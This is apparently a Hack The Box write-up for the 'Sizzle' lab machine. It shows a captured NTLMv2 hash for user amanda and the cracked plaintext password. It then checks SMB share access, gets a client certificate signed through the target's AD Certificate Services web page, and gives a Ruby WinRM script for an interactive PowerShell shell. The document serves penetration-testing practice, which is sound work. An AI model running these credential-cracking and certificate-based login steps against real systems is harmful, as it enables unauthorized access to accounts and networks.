20-GetAmanda
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.10.103
[SMB] NTLMv2-SSP Username : HTB\amanda
[SMB] NTLMv2-SSP Hash : amanda::HTB:aa3b1bcd824893e1:2FA79FA09DB6A0020A2FCDFDFAC59387:010100000000000080211D592E47DA01B93C43255C9BB7330000000002000800350052004200480001001E00570049004E002D0038004900340035004A004A005300420039005200350004003400570049004E002D0038004900340035004A004A00530042003900520035002E0035005200420048002E004C004F00430041004C000300140035005200420048002E004C004F00430041004C000500140035005200420048002E004C004F00430041004C000700080080211D592E47DA0106000400020000000800300030000000000000000100000000200000A0AF808B894BFA13AF00EEE97B8CA67C837017758B136BB14095FA8F3A1D79A70A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E0031003000000000000000000000000000
Cracked her password with hashcat
Amanda:Ashare1972
Sizzle smbmap -u amanda -p 'Ashare1972' -H 10.10.10.103
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 10.10.10.103:445 Name: sizzle Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
CertEnroll READ ONLY Active Directory Certificate Services share
Department Shares READ ONLY
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
Operations NO ACCESS
SYSVOL READ ONLY Logon server share
The password works
The server does not lets me login to the system when i use evil winrm, it may be because it needs a certificate in order to login. We ll create a certificate using open ssl and the web server will sign it for us.
Certificate...
Creating a key
➜ Sizzle openssl genrsa -aes256 -out amanda.key 2048
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
Certificate sign
➜ Sizzle openssl req -new -key amanda.key -out amanda.csr
Enter pass phrase for amanda.key:
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:
Email Address []:
Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
➜ Sizzle cat amanda.csr
-----BEGIN CERTIFICATE REQUEST-----
MIICijCCAXICAQAwRTELMAkGA1UEBhMCQVUxEzARBgNVBAgMClNvbWUtU3RhdGUx
ITAfBgNVBAoMGEludGVybmV0IFdpZGdpdHMgUHR5IEx0ZDCCASIwDQYJKoZIhvcN
AQEBBQADggEPADCCAQoCggEBALWcwBmbYCyEEPPHUeFTgjbMu+u4Vs7RIco+01Gs
aBMPd13J3pgMsEtM8BvlCmg/JDdF5CogmAMWuODifr+FG8mlzQGzYps+m7+Z4ppG
fLJRK45mMk4iMdIGOTiyPQ7ViliKNRxXn6g03u2YjDJ2Z1Y6bawtRXAO79eBHWWa
ky52MEZj862IhZZ2+9+9OZI9ymorxvJhaIarwg6qxp58ZEdMK6IyD7ljjgRMfsJk
H1A6pR47/fd3HS/CDpMVzeps99GYPM61FMLNXqjor1wrphzsdE00HjEXtHa6C8w5
9KxAkUhIXEMUJEdJN3pj7yHXX9mlm25s8g4RdsCfoKtRYZsCAwEAAaAAMA0GCSqG
SIb3DQEBCwUAA4IBAQAWcuSLMBJoLhNnHsrMywJ8ZWTnBlMRIi4EG457lQuAsmRq
qrc5qzKncNqbzI0XuFVjSfWX1zy7Yz7tjZ8E8mdhEEM8h0sAAgGeFH1eUgnXj4aH
3A4Um4lWrc0HOVC8SKYcbwxdGzGMaBUerqV9pcH7cSUl/x33BjvbWXrLsqZfK55l
d3O26AOty1UeBMuk6xn355rneX5/AI8hL93mXd5gKtlUG6VWYGvW6505Oz6teCEp
7cytsg1K6Ct1hyF6f6DXYYJGojj47kOa80XkT1r0+gjfkgR7yR4FbJwVvFgAuXj9
WnVxcyCCpVUYc68M/H5jvG8qehnZF1RV/MiuQt2O
-----END CERTIFICATE REQUEST-----
the Web server will sign it for us.http://10.10.10.103/certsrv/certrqxt.asp
Paste the key and hit submit
Download the certificate.
mv ~/Downloads/certnew.cer amanda.cer
A script that 0xdf used to sign in to the Target using certificates.
https://raw.githubusercontent.com/Alamot/code-snippets/master/winrm/winrm_shell.rb
psRemote.rb
require 'winrm'
# Author: Alamot
conn = WinRM::Connection.new(
endpoint: 'https://10.10.10.103:5986/wsman',
transport: :ssl,
:client_cert => 'amanda.cer',
:client_key => 'amanda.key',
:no_ssl_peer_verification => true
)
command=""
conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
output = shell.run(command) do |stdout, stderr|
STDOUT.print stdout
STDERR.print stderr
end
end
puts "Exiting with code #{output.exitcode}"
end
➜ Sizzle ruby psRemote.rb
Enter PEM pass phrase:
PS htb\amanda@SIZZLE Documents> whoami
Enter PEM pass phrase:
htb\amanda
PS htb\amanda@SIZZLE Documents> whoami
htb\amanda
PS htb\amanda@SIZZLE Documents>